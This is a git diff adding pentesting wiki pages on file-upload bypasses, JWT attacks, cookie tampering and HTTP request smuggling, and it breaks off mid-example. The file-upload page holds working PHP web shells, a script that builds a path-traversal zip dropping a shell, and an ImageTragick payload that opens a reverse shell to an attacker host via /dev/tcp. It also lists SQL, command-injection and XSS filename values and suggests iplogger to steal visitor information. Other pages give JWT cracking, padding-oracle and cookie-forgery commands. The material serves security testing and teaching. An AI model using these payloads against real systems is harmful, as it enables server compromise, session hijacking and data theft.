--- /dev/null
+++ b/pentesting-web/file-upload.md
@@ -0,0 +1,210 @@
+# File Upload
+
+## File Upload General Methodology
+
+1. Try to upload a file with a **double extension** \(ex: _file.png.php_ or _file.png.php5_\).
+   * PHP extensions: _.php_, _.php2_, _.php3_, ._php4_, ._php5_, ._php6_, ._php7_, ._phps_, ._pht_, _.phtml_, ._pgif_, _.shtml, .htaccess, .phar, .inc_
+   * ASP extensions: _.asp, .aspx, .config_
+2. Try to **uppercase some letter\(s\)** of the extension. Like: _.pHp, .pHP5, .PhAr ..._
+3. Try to upload some **double \(or more\) extension** \(useful to bypass misconfigured checks that test if a specific extension is just present\):
+   1. _file.png.php_
+   2. _file.png.txt.php_
+4. Try to upload some **reverse double extension** \(useful to exploit Apache misconfigurations where anything with extension _.php_, but **not necessarily ending in .php** will execute code\):
+   * _ex: file.php.png_
+5. Double extension with **null character:**
+   1. _ex: file.php%00.png_
+6. **Add some especial characters at the end** of the extension_: %00, %20, \(several dots\)...._
+   1. _file.php%00_
+   2. _file.php%20_
+   3. _file.php...... --&gt; In Windows when a file is created with dots at the end those will be removed \(so you can bypass filters that checks for .php as extension\)_
+   4. _file.php/_
+   5. _file.php.\_
+7. Bypass Content-Type checks by setting the **value** of the **Content-Type** **header** to: _image/png_ , _text/plain , application/octet-stream_
+8. Bypass magic number check by adding at the beginning of the file the **bytes of a real image** \(confuse the _file_ command\). Or introduce the shell inside the **metadata**: `exiftool -Comment="<?php echo 'Command:'; if($_POST){system($_POST['cmd']);} __halt_compiler();" img.jpg`
+   1. It is also possible that the **magic bytes** are just being **checked** in the file and you could set them **anywhere in the file**.
+9. Using **NTFS alternate data stream \(ADS\)** in **Windows**. In this case, a colon character “:” will be inserted after a forbidden extension and before a permitted one. As a result, an **empty file with the forbidden extension** will be created on the server \(e.g. “file.asax:.jpg”\). This file might be edited later using other techniques such as using its short filename. The “**::$data**” pattern can also be used to create non-empty files. Therefore, adding a dot character after this pattern might also be useful to bypass further restrictions \(.e.g. “file.asp::$data.”\)
+10. **Upload** the backdoor with an **allowed extension** \(_png_\) and pray for a **misconfiguration** that executes the backdoor
+11. Find a vulnerability to **rename** the file already uploaded \(to change the extension\).
+12. Find a **Local File Inclusion** vulnerability to execute the backdoor.
+13. **Possible Information disclosure**:
+    1. Upload **several times** \(and at the **same time**\) the **same file** with the **same name**
+    2. Upload a file with the **name** of a **file** or **folder** that **already exists**
+    3. Uploading a file with **“.”, “..”, or “…” as its name**. For instance, in Apache in **Windows**, if the application saves the uploaded files in “/www/uploads/” directory, the “.” filename will create a file called “uploads” in the “/www/” directory.
+    4. Upload a file that may not be deleted easily such as **“…:.jpg”** in **NTFS**. \(Windows\)
+    5. Upload a file in **Windows** with **invalid characters** such as `|<>*?”` in its name. \(Windows\)
+    6. Upload a file in **Windows** using **reserved** \(**forbidden**\) **names** such as CON, PRN, AUX, NUL, COM1, COM2, COM3, COM4, COM5, COM6, COM7, COM8, COM9, LPT1, LPT2, LPT3, LPT4, LPT5, LPT6, LPT7, LPT8, and LPT9.
+
+Try also to **upload an executable** \(.exe\) or an **.html** \(less suspicious\) that **will execute code** when accidentally opened by victim.
+
+{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20insecure%20files" %}
+
+If you are trying to upload files to a **PHP server**, [take a look at the **.htaccess** trick to execute code](https://book.hacktricks.xyz/pentesting/pentesting-web/php-tricks-esp#code-execution-via-httaccess).  
+If you are  trying to upload files to an **ASP server**, [take a look at the **.config** trick to execute code](../pentesting/pentesting-web/iis-internet-information-services.md#execute-config-files).
+
+The `.phar` files are like the `.jar` for java, but for php, and can be **used like a php file** \(executing it with php, or including it inside a script...\)
+
+The `.inc` extension is sometimes used for php files that are only used to **import files**, so, at some point, someone could have allow **this extension to be executed**.
+
+**Check a lot of possible file upload vulnerabilities with BurpSuit plugin** [**https://github.com/modzero/mod0BurpUploadScanner**](https://github.com/modzero/mod0BurpUploadScanner) **or use a console application that finds which files can be uploaded and try different tricks to execute code:** [**https://github.com/almandin/fuxploider**](https://github.com/almandin/fuxploider)\*\*\*\*
+
+### **wget File Upload/SSRF Trick**
+
+In some occasions you may find that a server is using **`wget`** to **download files** and you can **indicate** the **URL**. In these cases, the code may be checking that the extension of the downloaded files is inside a whitelist to assure that only allowed files are going to be downloaded. However, **this check can be bypassed.**  
+The **maximum** length of a **filename** in **linux** is **255**, however, **wget** truncate the filenames to **236** characters. You can **download a file called "A"\*232+".php"+".gif"**, this filename will **bypass** the **check** \(as in this example **".gif"** is a **valid** extension\) but `wget` will **rename** the file to **"A"\*232+".php"**.
+
+```bash
+#Create file and HTTP server
+echo "SOMETHING" > $(python -c 'print("A"*(236-4)+".php"+".gif")')
+python3 -m http.server 9080
+```
+
+```bash
+#Download the file
+wget 127.0.0.1:9080/$(python -c 'print("A"*(236-4)+".php"+".gif")')
+The name is too long, 240 chars total.
+Trying to shorten...
+New name is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php.
+--2020-06-13 03:14:06--  http://127.0.0.1:9080/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php.gif
+Connecting to 127.0.0.1:9080... connected.
+HTTP request sent, awaiting response... 200 OK
+Length: 10 [image/gif]
+Saving to: ‘AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php’
+
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAA 100%[===============================================>]      10  --.-KB/s    in 0s      
+
+2020-06-13 03:14:06 (1.96 MB/s) - ‘AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php’ saved [10/10]
+```
+
+Note that **another option** you may be thinking of to bypass this check is to make the **HTTP server redirect to a different file**, so the initial URL will bypass the check by then wget will download the redirected file with the new name. This **won't work** **unless** wget is being used with the **parameter** `--trust-server-names` because **wget will download the redirected page with the name of the file indicated in the original URL**.
+
+## From File upload to other vulnerabilities
+
+* Set **filename** to `../../../tmp/lol.png` and try to achieve a **path traversal**
+* Set **filename** to `sleep(10)-- -.jpg` and you may be able to achieve a **SQL injection**
+* Set **filename** to `<svg onload=alert(document.comain)>` to achieve a XSS
+* Set **filename** to `; sleep 10;` to test some command injection \(more [command injections tricks here](command-injection.md)\)
+* \*\*\*\*[**XSS** in image \(svg\) file upload](xss-cross-site-scripting/#xss-uploading-files-svg)
+* **JS** file **upload** + **XSS** = [**Service Workers** exploitation](xss-cross-site-scripting/#xss-abusing-service-workers)
+* \*\*\*\*[**XXE in svg upload**](xxe-xee-xml-external-entity.md#svg-file-upload)\*\*\*\*
+* \*\*\*\*[**Open Redirect** via uploading svg file](open-redirect.md#open-redirect-uploading-svg-files)
+* [Famous **ImageTrick** vulnerability](https://mukarramkhalid.com/imagemagick-imagetragick-exploit/)
+* If you can **indicate the web server to catch an image from a URL** you could try to abuse a [SSRF](ssrf-server-side-request-forgery.md). If this **image** is going to be **saved** in some **public** site, you could also indicate a URL from [https://iplogger.org/invisible/](https://iplogger.org/invisible/) and **steal information of every visitor**.
+
+## Zip File Automatically decompressed Upload
+
+If you can upload a ZIP that is going to be decompressed inside the server, you can do 2 things:
+
+### Symlink 
+
+Upload a link containing soft links to other files, then, accessing the decompressed files you will access the linked files:
+
+```text
+ln -s ../../../index.php symindex.txt
+zip --symlinks test.zip symindex.txt
+```
+
+### Decompress in different folders
+
+The decompressed files will be created in unexpected folders.
+
+One could easily assume that this setup protects from OS-level command execution via malicious file uploads but unfortunately this is not true. Since ZIP archive format supports hierarchical compression and we can also reference higher level directories we can escape from the safe upload directory by abusing the decompression feature of the target application.
+
+An automated exploit to create this kind of files can be found here: [https://github.com/ptoomey3/evilarc](https://github.com/ptoomey3/evilarc)
+
+```python
+python evilarc.py -o unix -d 5 -p /var/www/html/ rev.php
+```
+
+Some python code to create a malicious zip:
+
+```python
+#!/usr/bin/python
+import zipfile
+from cStringIO import StringIO 
+ 
+def create_zip():
+    f = StringIO()
+    z = zipfile.ZipFile(f, 'w', zipfile.ZIP_DEFLATED)
+    z.writestr('../../../../../var/www/html/webserver/shell.php', '<?php echo system($_REQUEST["cmd"]); ?>')
+    z.writestr('otherfile.xml', 'Content of the file')
+    z.close()
+    zip = open('poc.zip','wb')
+    zip.write(f.getvalue())
+    zip.close() 
+ 
+create_zip() 
+```
+
+To achieve remote command execution I took the following steps:
+
+1. Create a PHP shell:
+
+```php
+<?php 
+if(isset($_REQUEST['cmd'])){
+    $cmd = ($_REQUEST['cmd']);
+    system($cmd);
+}?>
+```
+
+2. Use “file spraying” and create a compressed zip file:
+
+```text
+root@s2crew:/tmp# for i in `seq 1 10`;do FILE=$FILE"xxA"; cp simple-backdoor.php $FILE"cmd.php";done
+root@s2crew:/tmp# ls *.php
+simple-backdoor.php  xxAxxAxxAcmd.php        xxAxxAxxAxxAxxAxxAcmd.php        xxAxxAxxAxxAxxAxxAxxAxxAxxAcmd.php
+xxAcmd.php           xxAxxAxxAxxAcmd.php     xxAxxAxxAxxAxxAxxAxxAcmd.php     xxAxxAxxAxxAxxAxxAxxAxxAxxAxxAcmd.php
+xxAxxAcmd.php        xxAxxAxxAxxAxxAcmd.php  xxAxxAxxAxxAxxAxxAxxAxxAcmd.php
+root@s2crew:/tmp# zip cmd.zip xx*.php
+  adding: xxAcmd.php (deflated 40%)
+  adding: xxAxxAcmd.php (deflated 40%)
+  adding: xxAxxAxxAcmd.php (deflated 40%)
+  adding: xxAxxAxxAxxAcmd.php (deflated 40%)
+  adding: xxAxxAxxAxxAxxAcmd.php (deflated 40%)
+  adding: xxAxxAxxAxxAxxAxxAcmd.php (deflated 40%)
+  adding: xxAxxAxxAxxAxxAxxAxxAcmd.php (deflated 40%)
+  adding: xxAxxAxxAxxAxxAxxAxxAxxAcmd.php (deflated 40%)
+  adding: xxAxxAxxAxxAxxAxxAxxAxxAxxAcmd.php (deflated 40%)
+  adding: xxAxxAxxAxxAxxAxxAxxAxxAxxAxxAcmd.php (deflated 40%)
+root@s2crew:/tmp#
+```
+
+3.Use a hexeditor or vi and change the “xxA” to “../”, I used vi:
+
+```text
+:set modifiable
+:%s/xxA/..\//g
+:x!
+```
+
+Done!
+
+Only one step remained: Upload the ZIP file and let the application decompress it! If it is succeeds and the web server has sufficient privileges to write the directories there will be a simple OS command execution shell on the system:
+
+[![b1](https://blog.silentsignal.eu/wp-content/uploads/2014/01/b1-300x106.png)](https://blog.silentsignal.eu/wp-content/uploads/2014/01/b1.png)
+
+**Reference**: [https://blog.silentsignal.eu/2014/01/31/file-upload-unzip/](https://blog.silentsignal.eu/2014/01/31/file-upload-unzip/)
+
+## ImageTragic
+
+Upload this content with an image extension to exploit the vulnerability **\(ImageMagick , 7.0.1-1\)**
+
+```text
+push graphic-context
+viewbox 0 0 640 480
+fill 'url(https://127.0.0.1/test.jpg"|bash -i >& /dev/tcp/attacker-ip/attacker-port 0>&1|touch "hello)'
+pop graphic-context
+```
+
+## Polyglot Files
+
+Polyglots, in a security context, are files that are a valid form of multiple different file types. For example, a [GIFAR](https://en.wikipedia.org/wiki/Gifar) is both a GIF and a RAR file. There are also files out there that can be both GIF and JS, both PPT and JS, etc.
+
+Polyglot files are often used to bypass protection based on file types. Many applications that allow users to upload files only allow uploads of certain types, such as JPEG, GIF, DOC, so as to prevent users from uploading potentially dangerous files like JS files, PHP files or Phar files.
+
+This helps to upload a file that complins with the format of several different formats. It can allows you to upload a PHAR file \(PHp ARchive\) that also looks like a JPEG, but probably you will still needs a valid extension and if the upload function doesn't allow it this won't help you.
+
+More information in: [https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a](https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a)
+
+
+
diff --git a/pentesting-web/hacking-jwt-json-web-tokens.md b/pentesting-web/hacking-jwt-json-web-tokens.md
new file mode 100644
index 00000000..f688ffde
--- /dev/null
+++ b/pentesting-web/hacking-jwt-json-web-tokens.md
@@ -0,0 +1,135 @@
+# JWT Vulnerabilities \(Json Web Tokens\)
+
+**Part of this post was taken from:** [**https://github.com/ticarpi/jwt\_tool/wiki/Attack-Methodology**](https://github.com/ticarpi/jwt_tool/wiki/Attack-Methodology)  
+**Author of the great tool to pentest JWT** [**https://github.com/ticarpi/jwt\_tool**](https://github.com/ticarpi/jwt_tool)\*\*\*\*
+
+## Tamper data without modifying anything
+
+You can just tamper with the data leaving the signature as is and check if the server is checking the signature. Try to change your username to "admin" for example.
+
+### **Is the token checked?**
+
+* If an error message occurs the signature is being checked - read any verbose error info that might leak something sensitive.
+* If the page returned is different the signature is being checked.
+* If the page is the same then the signature is not being checked - time to start tampering the Payload claims to see what you can do!
+
+## Origin
+
+Check where the token originated in your proxy's request history. It should be created on the server, not the client.
+
+* If it was first seen coming from the client-side then the **key** is accessible to client-side code - seek it out!
+* If it was first seen coming from the server then all is well.
+
+## Duration
+
+Check if the token lasts more than 24h... maybe it never expires. If there is a "exp" filed, check if the server is correctly handling it.
+
+## Brute-force HMAC secret 
+
+```bash
+git clone https://github.com/Sjord/jwtcrack.git
+cd jwtcrack
+
+#Bruteforce using crackjwt.py
+python crackjwt.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc /usr/share/wordlists/rockyou.txt
+
+#Bruteforce using john
+python jwt2john.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc > jwt.john
+john jwt.john #It does not work with Kali-John
+```
+
+## Modify the algorithm to None \(CVE-2015-9235\)
+
+Set the algorithm used as "None" and remove the signature part.
+
+Use the Burp extension call "JSON Web Token" to try this vulnerability and to change different values inside the JWT \(send the request to Repeater and in the "JSON Web Token" tab you can modify the values of the token. You can also select to put the value of the "Alg" field to "None"\).
+
+## Change the algorithm RS256\(asymmetric\) to HS256\(symmetric\) \(CVE-2016-5431\)
+
+The algorithm HS256 uses the secret key to sign and verify each message.  
+The algorithm RS256 uses the private key to sign the message and uses the public key for authentication.
+
+If you change the algorithm from RS256 to HS256, the back end code uses the public key as the secret key and then uses the HS256 algorithm to verify the signature.
+
+Then, using the public key and changing SR256 to HS256 we could create a valid signature. You can retrieve the certificate of the web server executing this: 
+
+```bash
+openssl s_client -connect example.com:443 2>&1 < /dev/null | sed -n '/-----BEGIN/,/-----END/p' > certificatechain.pem #For this attack you can use the JOSEPH Burp extension. In the Repeater, select the JWS tab and select the Key confusion attack. Load the PEM, Update the request and send it. (This extension allows you to send the "non" algorithm attack also). It is also recommended to use the tool jwt_tool with the option 2 as the previous Burp Extension does not always works well.
+openssl x509 -pubkey -in certificatechain.pem -noout > pubkey.pem
+```
+
+## New public key inside the header
+
+An attacker embeds a new key in the header of the token and the server uses this new key to verify the signature \(CVE-2018-0114\).
+
+This can be done with the "JSON Web Tokens" Burp extension.  
+\(Send the request to the Repeater, inside the JSON Web Token tab select "CVE-2018-0114" and send the request\).
+
+## JWKS Spoofing
+
+If the token uses a “jku” Header claim then check out the provided URL. This should point to a URL containing the JWKS file that holds the Public Key for verifying the token. Tamper the token to point the jku value to a web service you can monitor traffic for.
+
+If you get an HTTP interaction you now know that the server is trying to load keys from the URL you are supplying. _Use jwt\_tool's -S flag alongside the -u_ [_http://example.com_](http://example.com/) _argument to generate a new key pair, inject your provided URL, generate a JWKS containing the Public Key, and sign the token with the Private Key_
+
+## Kid issues
+
+ `kid` is an optional header claim which holds a key identifier, particularly useful when you have multiple keys to sign the tokens and you need to look up the right one to verify the signature.
+
+### "kid" issues - reveal key:
+
+If the claim "kid" is used in the header, check the web directory for that file or a variation of it. For example if "kid":"key/12345” then look for /key/12345 and /key/12345.pem on the web root.
+
+### "kid" issues - path traversal:
+
+If the claim "kid" is used in the header, check if you can use a different file in the file system. Pick a file you might be able to predict the content of, or maybe try "kid":"/dev/tcp/_yourIP_/_yourPort_ to test connectivity, or even some SSRF payloads...  
+_Use jwt\_tool's -T flag to tamper the JWT and change the value of the kid claim, then choose to keep the original signature_
+
+## Miscellaneous attacks
+
+The following are known weaknesses that should be tested for.
+
+#### Cross-service relay attacks
+
+Some web applications use a trusted JWT ‘service’ to generate and manage tokens for them. In the past some instances have occurred where a token generated for one of the JWT services’ clients can actually be accepted by another of the JWT services’ clients.  
+If you observe the JWT being issued or renewed via a third-party service then it is worth identifying if you can sign up for an account on another of that service’s clients with your same username/email. If so try taking that token and replaying it in a request to your target. Is it accepted?
+
+* If your token is accepted then you may have a critical issue allowing you to spoof any user’s account. HOWEVER, be aware that if you are signing up on a third party application you may need to seek permission for wider testing permissions in case it enters a legal grey-area!
+
+#### Is exp checked?
+
+The “exp” Payload claim is used to check the expiry of a token. As JWTs are often used in the absence of session information, so they do need to be handled with care - in many cases capturing and replaying someone else’s JWT will allow you to masquerade as that user.  
+One mitigation against JWT replay attacks \(that is advised by the JWT RFC\) is to use the “exp” claim to set an expiry time for the token. It is also important to set the relevant checks in place in the application to make sure this value is processed and the token rejected where it is expired. If the token contains an “exp” claim and test time limits permit it - try storing the token and replaying it after the expiry time has passed. _Use jwt\_tool's -R flag to read the content of the token, which includes timestamp parsing and expiry checking \(timestamp in UTC\)_
+
+* If the token still validates in the application then this may be a security risk as the token may NEVER expire.
+
+## x5u and jku
+
+### jku
+
+jku stands for **JWK Set URL**.  
+If the token uses a “**jku**” **Header** claim then **check out the provided URL**. This should point to a URL containing the JWKS file that holds the Public Key for verifying the token. Tamper the token to point the jku value to a web service you can monitor traffic for.
+
+If you get an HTTP interaction you now know that the server is trying to load keys from the URL you are supplying. _Use `jwt_tool's -S flag` alongside the `-u http://example.com` argument to generate a new key pair, inject your provided URL, generate a JWKS containing the Public Key, and sign the token with the Private Key_
+
+### x5u
+
+X.509 URL. A URI pointing to a set of X.509 \(a certificate format standard\) public certificates encoded in PEM form. The first certificate in the set must be the one used to sign this JWT. The subsequent certificates each sign the previous one, thus completing the certificate chain. X.509 is defined in RFC 52807 . Transport security is required to transfer the certificates.
+
+Try to change this header to an URL under your control and check if any request is received. In that case you could tamper the JWT.
+
+You can also abuse both of these vulns if Open redirects, header injection or if you can upload a file inside the server and the server is just whitelisting the domain and not the path.
+
+
+
+## JWT Registered claims
+
+{% embed url="https://www.iana.org/assignments/jwt/jwt.xhtml\#claims" %}
+
+## Tools
+
+{% embed url="https://github.com/ticarpi/jwt\_tool" %}
+
+
+
+
+
diff --git a/pentesting-web/hacking-with-cookies.md b/pentesting-web/hacking-with-cookies.md
new file mode 100644
index 00000000..004945e0
--- /dev/null
+++ b/pentesting-web/hacking-with-cookies.md
@@ -0,0 +1,125 @@
+# Cookies Hacking
+
+## Hacking cookies
+
+If you find some kind of custom cookie containing sensitive data \(sessionID, username, emails...\) you should definitely try to exploit it
+
+### Decoding the cookie
+
+If the **cookie** is using some **Base encoding** \(like Base64\) or similar you may be able to **decode it**, **change** the **content** and **impersonate** arbitrary users.
+
+### Session Hijacking
+
+Steal a cookie and use it to impersonate the user inside an application
+
+### Session fixation
+
+The attacker get a cookie from a web page and send to the victim a link so the victim logins using the cookie of the attacker. If the cookie is not changed when a user logs in, this could be useful because the attacker could be able to impersonate the user using the cookie.
+
+### Session donation
+
+The attacker sends his own session to the victim. The victim will see that he is already loged and will suppose that he is inside his own account but the actions will be performed inside the attackers account.
+
+### [JWT Cookie](hacking-jwt-json-web-tokens.md)
+
+Click on the previous link to access a page explaining possible flaws in JWT.
+
+### Checking Cookies
+
+#### **Basic checks**
+
+* The **cookie** are the **same** every time you **login**
+* Log out and try to use the same cookie
+* Try to login with 2 devices \(or browsers\) to the same account using the same cookie
+* Check if the cookie has any information in it and try to modify it
+* Try to create several accounts with almost the same username and check if you can see similarities.
+* Check "**remember me**" option if it exists and check how does it works. If it exists and could be vulnerable, always use the cookie of **remember me** without any other cookie.
+* If you change the password and previous cookie still works
+
+#### **Advanced cookies attacks**
+
+If the cookie remains the same \(or almost\) when you log in, this probably means that the cookie is related to some field of your account \(probably the username\). Then you can:
+
+* Try to create a lot of **accounts** with usernames very **similar** and try to **guess** how is working the algorithm
+* Try to **bruteforce the username**. If the cookie saves only as authentication method your username, then you can create an account with username "**Bmin**" and **bruteforce** every single **bit** of your cookie because one of the cookies that you will try will the one belonging to "**admin**".
+* Try **Padding** **Oracle** \(you can decrypt the content of the cookie\). Use **padbuster**.
+
+**Padding Oracle - Padbuster examples**
+
+```bash
+padbuster <URL/path/when/successfully/login/with/cookie> <COOKIE> <PAD[8-16]>
+# When cookies and regular Base64
+padbuster http://web.com/index.php u7bvLewln6PJPSAbMb5pFfnCHSEd6olf 8 -cookies auth=u7bvLewln6PJPSAbMb5pFfnCHSEd6olf
+
+# If Base64 urlsafe or hex-lowercase or hex-uppercase --encoding parameter is needed, for example:
+padBuster http://web.com/home.jsp?UID=7B216A634951170FF851D6CC68FC9537858795A28ED4AAC6
+7B216A634951170FF851D6CC68FC9537858795A28ED4AAC6 8 -encoding 2
+```
+
+Padbuster will make several attempts and will ask you which condition is the error condition \(the one that is not valid\).
+
+Then it will start decrypting the cookie \(it may take several minutes\)
+
+If the attack has been successfully performed, then you could try to encrypt a string of your choice. For example,  if you would want to **encrypt** **user=administrator**
+
+```text
+padbuster http://web.com/index.php 1dMjA5hfXh0jenxJQ0iW6QXKkzAGIWsiDAKV3UwJPT2lBP+zAD0D0w== 8 -cookies thecookie=1dMjA5hfXh0jenxJQ0iW6QXKkzAGIWsiDAKV3UwJPT2lBP+zAD0D0w== -plaintext user=administrator
+```
+
+This execution will give you the cookie correctly encrypted and encoded with the string **user=administrator** inside.
+
+**CBC-MAC**
+
+Maybe a cookie could have some value and could be signed using CBC. Then, the integrity of the value is the signature created by using CBC with the same value. As it is recommended to use as IV a null vector, this type of integrity checking could be vulnerable.
+
+**The attack**
+
+1. Get the signature of username **administ** =  **t**
+2. Get the signature of username **rator\x00\x00\x00 XOR t** = **t'**
+3. Set in the cookie the value **administrator+t'** \(**t'** will be a valid signature of **\(rator\x00\x00\x00 XOR t\) XOR t** = **rator\x00\x00\x00**
+
+**ECB**
+
+If the cookie is encrypted using ECB it could be vulnerable.  
+When you login the cookie that you receive has to be always the same.
+
+**How to detect and attack:**
+
+Create 2 users with almost the same data \(username, password, email...\) and try to discover some pattern inside the given cookie
+
+Create a user called form example "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" and check if there is any pattern in the cookie \(as ECB encrypts with the same key every block, the same encrypted bytes could appear if the username is encrypted\).
+
+There should be a pattern \(with the size of a used block\). So, knowing how are a bunch of "a" encrypted you can create a username: "a"\*\(size of block\)+"admin". Then, you could delete the encrypted pattern of a block of "a" from the cookie. And you will have the cookie of the username "admin".
+
+## Cookies Flags
+
+### SameSite
+
+This will indicate the browser if the **cookie** can be sent **from other domains**. It has 2 possible values:
+
+* **Strict**: The cookie will not be sent along with request by third party websites.
+* **Lax**: The cookie will be sent along with the GET request initiated by third party websites.
+
+| **Request Type** | **Example Code** | **Cookies sent** |
+| :--- | :--- | :--- |
+| Link | &lt;a href="..."&gt;&lt;/a&gt; | Normal, Lax |
+| Perender | &lt;link rel="prerender" href=".."/&gt; | Normal, Lax |
+| Form GET | &lt;form method="GET" action="..."&gt; | Normal, Lax |
+| Form POST | &lt;form method="POST" action="..."&gt; | Normal |
+| iframe | &lt;iframe src="..."&gt;&lt;/iframe&gt; | Normal |
+| AJAX | $.get\("..."\) | Normal |
+| Image | &lt;img src="..."&gt; | Normal |
+
+Table from [here](https://www.netsparker.com/blog/web-security/same-site-cookie-attribute-prevent-cross-site-request-forgery/)  
+A cookie with _**SameSite**_ attribute will **mitigate CSRF attacks** where a logged session is needed.
+
+**Notice that from Chrome80 \(feb/2019\) the default behaviour of a cookie without a cookie** _**samesite**_ **attribute will be lax** \([https://www.troyhunt.com/promiscuous-cookies-and-their-impending-death-via-the-samesite-policy/](https://www.troyhunt.com/promiscuous-cookies-and-their-impending-death-via-the-samesite-policy/)\). Notice that temporary, after applying this change, the **cookies without a SameSite** **policy** in Chrome will be **treated as None during the first 2 minutes and then as Lax**.
+
+### HttpOnly
+
+This avoids the **client** to access the cookie \(Via **Javascript** for example: `document.cookie`\)
+
+### Secure
+
+The request will **only** send the cookie in an HTTP request only if the request is transmitted over a secure channel \(typically **HTTPS**\).
+
diff --git a/pentesting-web/http-request-smuggling.md b/pentesting-web/http-request-smuggling.md
new file mode 100644
index 00000000..0295f117
--- /dev/null
+++ b/pentesting-web/http-request-smuggling.md
@@ -0,0 +1,490 @@
+# HTTP Request Smuggling / HTTP Desync Attack
+
+## What is
+
+This vulnerability occurs when a **desyncronization** between **front-end proxies** and the **back-end** server allows an **attacker** to **send** an HTTP **request** that will be **interpreted** as a **single request** by the **front-end** proxies \(load balance/reverse-proxy\) and **as 2 request** by the **back-end** server.  
+This allows a user to **modify the next request that arrives to the back-end server after his**.
+
+### Theory
+
+#### [RFC Specification \(2161\)](https://tools.ietf.org/html/rfc2616)
+
+> If a message is received with both a Transfer-Encoding header field and a Content-Length header field, the latter MUST be ignored.
+
+#### Content-Length
+
+> The Content-Length entity header indicates the size of the entity-body, in bytes, sent to the recipient.
+
+#### Transfer-Encoding: chunked
+
+> The Transfer-Encoding header specifies the form of encoding used to safely transfer the payload body to the user.  
+> Chunked means that large data is sent in a series of chunks
+
+### Reality
+
+The **Front-End** \(a load-balance / Reverse Proxy\) **process** the _**content-length**_ or the _**transfer-encoding**_ header and the **Back-end** server **process the other** one provoking a **desyncronization** between the 2 systems.   
+This could be very critical as **an attacker will be able to send one request** to the reverse proxy that will be **interpreted** by the **back-end** server **as 2 different requests**. The **danger** of this technique resides in the fact the **back-end** server **will interpret** the **2nd request injected** as if it **came from the next client** and the **real request** of that client will be **part** of the **injected request**.
+
+### Particularities
+
+Remember that in HTTP **a new line character is composed by 2 bytes: `\r\n`**
+
+* **Content-Length**: This header uses a **decimal number** to indicate the **number** of **bytes** of the **body** of the request. The body is expected to end in the last character, **a new line is not needed in the end of the request**.
+* **Transfer-Encoding:** This header uses in the **body** an **hexadecimal number** to indicate the **number** of **bytes** of the **next chunk**. The **chunk** must **end** with a **new line** but this new line **isn't counted** by the length indicator.  This transfer method must end with a **chunk of size 0 followed by 2 new lines**: `0\r\n\r\n`
+* **Connection**: Based on my experience it's recommended to use **`Connection: keep-alive`** on the first request of the request Smuggling.
+
+## Basic Examples
+
+So, request smuggling attacks involve placing both the `Content-Length` header and the `Transfer-Encoding` header into a single HTTP request and manipulating these so that the front-end and back-end servers process the request differently. The exact way in which this is done depends on the behaviour of the two servers:
+
+* **CL.TE**: the front-end server uses the `Content-Length` header and the back-end server uses the `Transfer-Encoding` header.
+* **TE.CL**: the front-end server uses the `Transfer-Encoding` header and the back-end server uses the `Content-Length` header.
+* **TE.TE**: the front-end and back-end servers both support the `Transfer-Encoding` header, but one of the servers can be induced not to process it by obfuscating the header in some way.
+
+### CL.TE vulnerabilities
+
+Here, the **front-end** server uses the **`Content-Length`** header and the **back-end** server uses the **`Transfer-Encoding`** header. We can perform a simple HTTP request smuggling attack as follows:
+
+`POST / HTTP/1.1  
+Host: vulnerable-website.com  
+Content-Length: 30  
+Connection: keep-alive  
+Transfer-Encoding: chunked  
+  
+0  
+  
+GET /404 HTTP/1.1  
+Foo: x`
+
+Note how `Content-Length` indicate the **bodies request length is 30 bytes long** \(_remember that HTTP uses `\r\n` as new line, so 2bytes each new line_\), so the reverse proxy **will send the complete request** to the back-end, and the back-end  will process the `Transfer-Encoding` header leaving the `GET /404 HTTP/1.1` as the **begging of the next request** \(BTW, the next request will be appended to `Foo:x<Next request starts here>`\).
+
+### TE.CL vulnerabilities
+
+Here, the front-end server uses the `Transfer-Encoding` header and the back-end server uses the `Content-Length` header. We can perform a simple HTTP request smuggling attack as follows:
+
+`POST / HTTP/1.1  
+Host: vulnerable-website.com  
